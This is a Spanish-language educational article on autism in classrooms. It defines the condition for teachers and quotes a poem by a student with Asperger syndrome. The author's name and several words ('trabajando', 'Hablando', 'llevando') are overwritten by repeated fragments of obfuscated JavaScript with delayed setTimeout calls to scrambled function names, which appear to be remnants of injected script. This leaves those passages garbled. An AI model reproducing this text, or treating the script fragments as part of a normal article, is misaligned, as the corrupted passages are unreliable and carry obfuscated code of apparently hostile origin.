EL AUTISMO EN LAS AULAS

                                                                                         Autora: Yolandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}anda Orellana Muñoz                                                            



                  El mundo del Autismo es aún bastante desconocido en los centros públicos . En este artículo pretendo dar pequeñas pinceladas, para dar a conocer las características principales del autismo, y en base a ellas poder trabajar  con estos alumnos, proporcionándoles  una educación adecuada e integradora. Muestro material personal , que utilizo a diario en mis clases y un caso práctico de la primera hora en el centro trabajandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando con un alumno autista dentro del aula.


Es una realidad la existencia cada vez mayor de niños con Autismo, también conocido como Trastorno Generalizado del Desarrollo.


El aumento de llegadas a los centros de niños con este Trastorno hace urgente la necesidad de una formación por parte del profesorado, ya que la mayoría de los centros de carácter ordinario cuentan con pocos especialistas y recursos para atender a estos alumnos , y es por lo que todo el claustro debe tener ciertas nociones sobre cómo entender y ayudar a estos alumnos.


Primero comenzaremos con una pequeña definición de Autismo , para continuar posteriormente con algunas pautas de actuación y fotos de material que puede ayudar mucho al profesorado para una adecuada  integración de niños Autistas en el Aula.


            La palabra autismo viene del Griego (Autos) que significa sumidos en si mismo:


“ Gente por todas partes


Hablandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando, llevandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando ropas chillonas


Sus diálogos son como el martilleo de


Los cascos de un caballo.


Los colores son cegadores


La charla me hace daño en los oídos


La brillantez  me hace daño en los ojos.


Oh! ¿Por qué la gente no será más silenciosa


Y llevar colores más apagados?


Este poema lo escribió Dianne Mear (1994), estudiante con Síndrome de Asperger, uno de los diversos tipos de autismos existentes. Algunas características de las personas con autismo es el rechazo a determinados sonidos, texturas o incluso colores como nos relata Dianne en su poema.